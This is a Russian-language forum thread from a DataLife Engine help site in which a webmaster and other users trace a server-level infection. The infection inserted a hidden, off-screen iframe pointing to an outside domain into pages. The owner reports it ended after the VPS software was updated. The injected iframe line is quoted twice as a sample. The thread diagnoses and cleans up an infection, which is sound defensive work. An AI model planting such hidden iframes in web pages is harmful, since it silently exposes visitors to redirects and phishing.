Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы » Редирект в опере 12.17

Редирект в опере 12.17


     30.05.2014    Все вопросы » Общие вопросы    3800

вопрос
Здравствуйте! Я уже писал ранее за редирект на одном сайте, увы, никто не нашел, но вот сейчас есть новые данные и может кто-то поможет. С сегодняшнего дня три сайта dle на данном сервере перестали открываться в Опере версии 12.17 (опера старого образца, на новой, версии 21.0 открывается без проблем). Просто показывает белую страницу. При попытке посмотреть исходный код выдает:
<iframe src="http://freeroomhostelz.com/" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe></body>
</html>

<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->

Этот фрейм нигде не нашел, хотя стоит Антишел Пафнутия, проверял пол дате замены файлов и т.д. Понятия не имею, где он сидит. Внимание! Во всех остальных браузерах работают сайты нормально! Я решил, что у меня проблемы с оперой, пока не начали жаловаться пользователи. При проверке оказалось, что все, кто жалуется, пользуются старой оперой версии 12.17. Скорее всего причина в не открытии в том, что данный сайт, который в коде во фрейме, сейчас недоступен и каким-то образом старая опера барахлит и не открывает всю страницу. Кто поможет найти фрейм и редирект? Оплата за труд гарантируется. Вот один из пациентов: miniigri.net

Ответил: Бахмут


В общем, так как проблема довольно живо обсуждалась на сайте, я непременно должен отписаться, как она решилась на данный момент.
1. Данный вирус, как я и предполагал, а потом подтвердил уважаемый Sander, не находится на файлах сайта и движка dle, которые располагаются по FTP.
2. Хостерами был прогнан антивирусом весь VPS-сервер - безрезультатно.
3. Проблема решилась после того, как на сервере был обновлен весь софт VPS. Пока двое суток - полет нормальный. Не знаю, вернется проблема или нет, закрыли дыру или нет, но хостеры уверяют, что все VPS обновлено до самой последней версии. Вполне возможно, что обновлением не только убрали шелл, но и закрыли уязвимость.

Всем спасибо за помощь!

29 комментариев

vitnet
PHP-developer

vitnet - 30 мая 2014 20:33 -

Потому что нормальный скрипт нужно ставить а всякую муть.

Смотрите index.php

Бахмут
Юзер

Бахмут - 30 мая 2014 20:50 -

vitnet, что вы имеете ввиду, под нормальным скриптом? Не ставить DLE? Или вы имели ввиду лицензию? Стоит именно она. Ничего лишнего нет и проверено годами все модули. Файл index.php и .htaccess проверил в первую очередь. Если б было все так легко(((. В общем, жду реальной помощи.

Бахмут
Юзер

Бахмут - 30 мая 2014 21:23 -

Еще один нюанс, в лайвинтернете остановилась статистика посещения сайтов с данной версии браузера примерно в обед. То есть, проблема имеется. Также попробовал в опере поставить настройки "маскироваться мод Mozilla Firefox" и тут же вошел. Чушь какая-то, но не пойму, где искать. Может на VPS сидит(((

Serik
Местный

Serik - 30 мая 2014 21:35 -

В хроме вредитель не срабатывает, а в старой опере KIS тут же блочит сайт. Где то в php сидит скорее всего. Сливайте весь сайт на комп и врубайте поиск по "freeroomhostelz" в нотепад++

СПАСИБО надо тыкать в кнопку!

Бахмут
Юзер

Бахмут - 30 мая 2014 22:02 -

Serik, уже скачивал и прогонял двумя прогами. Ничего не нашел. Может закодирован как-то. Может кто знает, куда можно обратиться за реальной помощью? Иначе скоро поисковики начнут блочить.
P.S. Искать нужно точно в движке, потому как на этом же сервере вордпресс работает без проблем.

vitnet
PHP-developer

vitnet - 30 мая 2014 22:27 -

Загляните еще в templates.class.php и *.js

Бахмут
Юзер

Бахмут - 30 мая 2014 22:32 -

vitnet, ничего подозрительного нет. На всякий "пожарный" и файл заменил. Не помогло...

Kolya groza morey
Юзер

Kolya groza morey - 30 мая 2014 23:40 -

Бекапы сайта есть?

xsash
Юзер

xsash - 30 мая 2014 23:57 -

проблема в том, что со стороны пользователя не особо то и видна проблема.
Вы бы кому из проверенных, ну или пальцем в небо, дали бы доступ к ftp

MTFX
Юзер

MTFX - 31 мая 2014 00:34 -

аналогичная проблема на многих сайтах ....своих
Дело не в опере
это iframe
перешарил все фтп - так и не нашол! ... подскажите что то ...


mastodontoff
Юзер

mastodontoff - 31 мая 2014 01:01 -

Может проблема не в сайте, а в вашем компьютере,? Пробывалю друзьям сылочки давать, чтобы они проверили у себя?

MTFX
Юзер

MTFX - 31 мая 2014 03:01 -

нет это iframe ... к счастью - опера его выявляет а мазилла - нет
Пробовал базу скачать - пробил - в базе нет ссылки - или она зашифрована

к двум часам ночи iframe исчез ... но проблема осталась - так как он вернется.

dj-avtosh
PHP-developer

dj-avtosh - 31 мая 2014 05:47 -

Очищу за денюшку) а ещё за денюшку помогут обезопаситься))

https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

dj-avtosh
PHP-developer

dj-avtosh - 31 мая 2014 05:48 -

И запросите пожалуйста у хостера сразу дрступы к ssh.

https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

Бахмут
Юзер

Бахмут - 31 мая 2014 08:27 -

dj-avtosh, с удовольствием вам заплачу за выполненную работу и доступ к ssh имеется. Но проблема несколько усложнилась. С утра старая опера начала открывать сайты. В исходном коде фрейма не вижу. Скорее всего, как я предполагал ранее, выявить его помог случай, когда вчера данный сайт , указанный во фрейме стал недоступен. Еще я подозреваю, что данный вирус пакостит у меня давненько. Я уже описывал проблему недавно, но так никто и не помог, потому как явно его не видно. Мой предыдущий вопрос на dle-faq. Скачивание всего сайта по FTP, поиск по домену, поиску по слову iframe не помог. Скорее всего действительно сидит на самом VPS. В общем, теперь поймать заразу и проверить, что ее Действительно нет стало несколько сложнее. Возьметесь?

Бахмут
Юзер

Бахмут - 31 мая 2014 10:38 -

Ну в общем, как я предполагал, оперу пускают на сайт. Но время от времени в течении короткого времени идет перенаправление на разные фишинг ресурсы, как я описывал в прошлой теме. dj-avtosh, надеюсь на вашу помощь.

Бахмут
Юзер

Бахмут - 31 мая 2014 11:52 -

... И опять оперу не пускает. Теперь еще и оперу-мини через мобильник.((

MTFX
Юзер

MTFX - 31 мая 2014 11:55 -

я тоже ищу у себя ... как найду - отпишусь

Бахмут
Юзер

Бахмут - 31 мая 2014 12:01 -

MTFX, спасибо, я тоже с утра в поисках. Сейчас на searchengines попробую найти кого-то. dj-avtosh не в сети скорее всего, на сайтах ужасно упала посещалка с яндекса. Время дорого, скоро будут санкции.

Sander
PHP-developer

Sander - 31 мая 2014 12:12 -

Могу помочь.
Мне интересно всякую пакость вычислять :)

SanDev.pro - мой блог.

Telegram: @sandev
Skype: Sander8804

Бахмут
Юзер

Бахмут - 31 мая 2014 12:14 -

Цитата: Sander
Sander
с удовольствием приму вашу помощь! Отпишу сейчас в личку.

dj-avtosh
PHP-developer

dj-avtosh - 31 мая 2014 13:50 -

если что, я в сети) в аське)

https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

Бахмут
Юзер

Бахмут - 31 мая 2014 14:19 -

В общем, Олег помог найти суть причины и отключил фрейм. Оказалось, что тег </body> заменяется функцией php на этот фрейм. Но не удалил скрипт, который сидит где-то внутри vps. Сейчас работает сисадмин по его нахождению. По результату отпишусь.

Бахмут
Юзер

Бахмут - 31 мая 2014 14:20 -

dj-avtosh, не найдут, я вам тут же отпишусь. Стучал вам ранее, но не было в сети.

dj-avtosh
PHP-developer

dj-avtosh - 31 мая 2014 14:36 -

вряд ли на впс будет вирус для www))

https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

Sander
PHP-developer

Sander - 31 мая 2014 15:08 -

Содержимое файла t.txt
</body>

<?PHP
$t = file_get_contents("t.txt");
echo $t;
?>

В результате будет выведено
<iframe src="http://freeroomhostelz.com/" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe></body>

Так что вирус уж точно не в php файлах.

SanDev.pro - мой блог.

Telegram: @sandev
Skype: Sander8804

dj-avtosh
PHP-developer

dj-avtosh - 31 мая 2014 15:42 -

шелл скрипт пишет php сигнатуры?

https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

Sander
PHP-developer

Sander - 31 мая 2014 16:17 -

Как именно это происходит - надеюсь ответит Бахмут, если ему дадут ответ с техподдержки хостинга.
Я не могу объяснить природу работы этого шелла, однако факт остается фактом...

SanDev.pro - мой блог.

Telegram: @sandev
Skype: Sander8804

MTFX
Юзер

MTFX - 31 мая 2014 16:02 -

выяснился интерестный факт ... 2 разных случая заражения с тем же iframe
в обоих случаях vps моло того - один хостер

Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

наверх